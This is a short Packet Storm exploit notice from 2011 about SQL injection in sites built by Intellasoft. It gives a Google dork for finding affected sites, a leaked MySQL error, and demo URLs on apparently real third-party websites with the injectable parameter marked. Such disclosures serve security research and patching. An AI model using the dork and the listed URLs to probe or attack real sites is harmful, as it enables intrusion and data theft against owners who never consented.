Intellasoft SQL Injection

2011-09-12T00:00:00
ID PACKETSTORM:105001
Type packetstorm
Reporter nGa Sa Lu
Modified 2011-09-12T00:00:00

Description

                                        
                                            `# Exploit Title: Intellasoft SQL INJECTION Vulnerabilities #   
# Date: 12/09/2011 #   
# Author: nGa Sa Lu [ N-S-L ] #   
# Service Link: http://www.intellasoft.ca #   
# Tested on: Vista #   
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #   
  
# Google Dork: "Site designed by Intellasoft"  
  
# SQL Error Statement  
ERROR - Please try again - if this error keeps occurring please notify site administrator  
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND id = 399' at line 1  
SELECT * FROM mainMenu WHERE sectionID = 1' AND id = 399  
  
# Demo:  
http://www.countercorner.ca/viewpage.php?w=main&SectionID=[SQL]  
http://www.zapatas.ca/viewpage.php?w=bar&vu=1&id=7  
  
#####################################################################  
#################Greetz to all MIRT members!#//#nGa Sa Lu################## #  
#####################################################################  
`